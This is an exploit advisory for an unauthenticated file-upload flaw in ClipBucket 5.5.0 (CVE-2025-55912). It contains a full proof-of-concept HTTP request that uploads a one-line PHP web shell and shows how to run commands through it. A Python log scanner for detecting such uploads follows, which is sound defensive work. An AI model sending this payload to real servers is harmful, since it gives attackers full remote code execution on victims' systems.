## https://sploitus.com/exploit?id=PACKETSTORM:211127
# Exploit Title: ClipBucket 5.5.0 - Arbitrary File Upload
    # Google Dork: N/A
    # Date: 2025-09-11
    # Exploit Author: Mukundsinh Solanki (r00td3str0y3r)
    # Vendor Homepage: https://clipbucket.com
    # Software Link: https://github.com/MacWarrior/clipbucket-v5
    # Version: <= 5.5.0
    # Tested on: Ubuntu 20.04 LTS, PHP 7.4
    # CVE: CVE-2025-55912

    ## Vulnerability Description:
    ClipBucket <= 5.5.0 suffers from an unauthenticated arbitrary file upload
    vulnerability in `upload/actions/photo_uploader.php`. Missing access
    controls and insufficient validation of uploaded files allow an attacker to
    upload a crafted PHP file and execute it remotely, leading to full remote
    code execution (RCE).
    
    ## PoC Request:
    
    POST /upload/actions/photo_uploader.php HTTP/1.1
    Host: victim.com
    Content-Type: multipart/form-data; boundary=----BOUND
    
    ------BOUND
    Content-Disposition: form-data; name="Filedata"; filename="shell.php"
    Content-Type: application/x-php
    
    <?php system($_GET['cmd']); ?>
    ------BOUND--
    
    
    The file is uploaded without authentication. The attacker can then access
    it:
    
    
    http://victim.com/files/photos/shell.php?cmd=id
    
    
    ## Impact:
    - Unauthenticated remote code execution (RCE)
    - Full compromise of target application and underlying server
    
    Regards,
    Mukundsinh Solanki
    +916355251151
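
For defenders triaging exposure, the following is an added example (not part of the original advisory or of ClipBucket) that scans web access logs for the two request shapes described above: a POST to the uploader endpoint, and any request for a script file under the photo directory, which should only ever serve images. The "combined" log format and the sample lines are assumptions constructed for illustration; the access log cannot show whether the uploader was authenticated, so upload hits are context and script requests are the high-confidence signal.

```python
import re
from urllib.parse import urlsplit, unquote

# Paths come from the advisory; the Apache/nginx "combined" log format is an assumption.
UPLOAD_ENDPOINT = "/upload/actions/photo_uploader.php"
PHOTO_DIR = "/files/photos/"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)$", re.IGNORECASE)
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def classify(line):
    """Return (kind, ip, path, status) for a suspicious line, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    path = unquote(urlsplit(m["target"]).path)  # drop query string, decode %xx
    status = int(m["status"])
    if m["method"] == "POST" and path == UPLOAD_ENDPOINT:
        return ("upload", m["ip"], path, status)
    if path.startswith(PHOTO_DIR) and SCRIPT_EXT.search(path):
        return ("script_in_photo_dir", m["ip"], path, status)
    return None

def scan(lines):
    """Return all findings plus the client IPs that uploaded, then ran a script."""
    findings, uploaders, correlated = [], set(), set()
    for line in lines:
        hit = classify(line)
        if hit is None:
            continue
        findings.append(hit)
        kind, ip, _, status = hit
        if kind == "upload" and 200 <= status < 300:
            uploaders.add(ip)
        elif kind == "script_in_photo_dir" and status == 200 and ip in uploaders:
            correlated.add(ip)
    return findings, correlated

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [11/Sep/2025:10:00:01 +0000] "GET /files/photos/cat.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Sep/2025:10:00:05 +0000] "POST /upload/actions/photo_uploader.php HTTP/1.1" 200 64 "-" "curl/8.0"',
    '203.0.113.9 - - [11/Sep/2025:10:00:09 +0000] "GET /files/photos/shell.php?cmd=id HTTP/1.1" 200 54 "-" "curl/8.0"',
    '192.0.2.44 - - [11/Sep/2025:10:02:00 +0000] "GET /files/photos/old.PHP HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Sep/2025:10:03:00 +0000] "POST /upload/actions/photo_uploader.php HTTP/1.1" 403 0 "-" "Mozilla/5.0"',
]
```

Calling `scan(SAMPLE)` returns four findings and one correlated client; a 200 response for any script path under the photo directory also indicates that the web server is configured to execute PHP from an upload location.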